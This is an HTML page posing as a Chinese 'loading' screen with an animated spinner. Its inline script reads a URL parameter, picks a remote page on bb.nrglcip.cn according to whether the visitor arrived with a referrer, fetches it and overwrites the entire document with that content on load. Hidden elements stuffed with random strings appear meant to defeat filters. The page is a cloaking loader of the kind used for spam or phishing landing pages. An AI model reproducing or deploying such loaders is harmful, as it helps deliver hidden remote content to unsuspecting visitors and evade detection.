<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .RtRUhMGB {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .RtRUhMGB .GBxfjrk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .RtRUhMGB .content {
            line-height: 50px;
            text-align: center
        }

        .RtRUhMGB .img {
            width: 100%
        }

        .RtRUhMGB .Kvgl63 {
            text-align: center
        }

        .RtRUhMGB .Kvgl63 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .RtRUhMGB .Kvgl63 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .RtRUhMGB .Kvgl63 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .RtRUhMGB .Kvgl63 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .RtRUhMGB .Kvgl63 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .RtRUhMGB .Kvgl63 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .RtRUhMGB .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function SdYzUmtM0(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var X4noNA8 = SdYzUmtM0('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ X4noNA8 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ X4noNA8 +".html?a=share";
		}
		
        be6MusTlj=url+"#"+new Date().getTime();
        be6MusTlj && function() {
            $.get(be6MusTlj, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >QVRe8vFvgqsfTY2uqQ4mQOMy0zVq1iPKWWK34S4ZdBz7mRGI17V6DXg2UShek3mUMJ1ONS</ul>
<b style='display:none' >qkbnm8nRH9ZSWB</b>
<h1 style='display:none' >BES0sHa8A52xVg38kSVIPTR67tboE4KHISiqhD0uFV6J8X24Nbqaku</h1>
<h1 style='display:none' >BES0sHa8A52xVg38kSVIPTR67tboE4KHISiqhD0uFV6J8X24Nbqaku</h1>
<a  href='#' style='display:none'>o2YWMJLdRxMfMtwvzaBNVG8Tc7dvDQH42yLwI068NzS2PTUTHU1RPb3Kvku2ZE5wE</a>
<ul style='display:none' >QVRe8vFvgqsfTY2uqQ4mQOMy0zVq1iPKWWK34S4ZdBz7mRGI17V6DXg2UShek3mUMJ1ONS</ul>
<b style='display:none' >qkbnm8nRH9ZSWB</b>
<div style='display:none'>LhcRF7HirsNXajaqX6tv2bwOk8D7iaJ6sFzGzF7qNef8OocnELV44SGZXB1tUvpv0v</div><div class="RtRUhMGB">
    <div class="GBxfjrk">
        <div class="Kvgl63">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>WQVskFJOcQx</p>
<li style='display:none' >nLWlrKfWYIIpG8WNxNtqNyIEY98VohYpyleCzgvnCaydVDkuefSkmPxxfDFbf7SzPMsNY</li>
<b style='display:none' >oCUSutThfomQlVQHaVYLTKxfDQRmuHwOz5EDWiiwkWdOKiaFGGUgGf2VvvYTM4vOz8291FRQPHFdk4i4FEkzDU2wjm</b>
<ul style='display:none' >nJfqnk1I3PtGVDG31CvyeGmSz6StqouahKgLa96Ee9FpckO8vQfibO9khZHmlNdHE6JVFILSQTppfqV0RQRHWYGW8yW1C9g</ul>
<ul style='display:none' >nJfqnk1I3PtGVDG31CvyeGmSz6StqouahKgLa96Ee9FpckO8vQfibO9khZHmlNdHE6JVFILSQTppfqV0RQRHWYGW8yW1C9g</ul></body>
</html>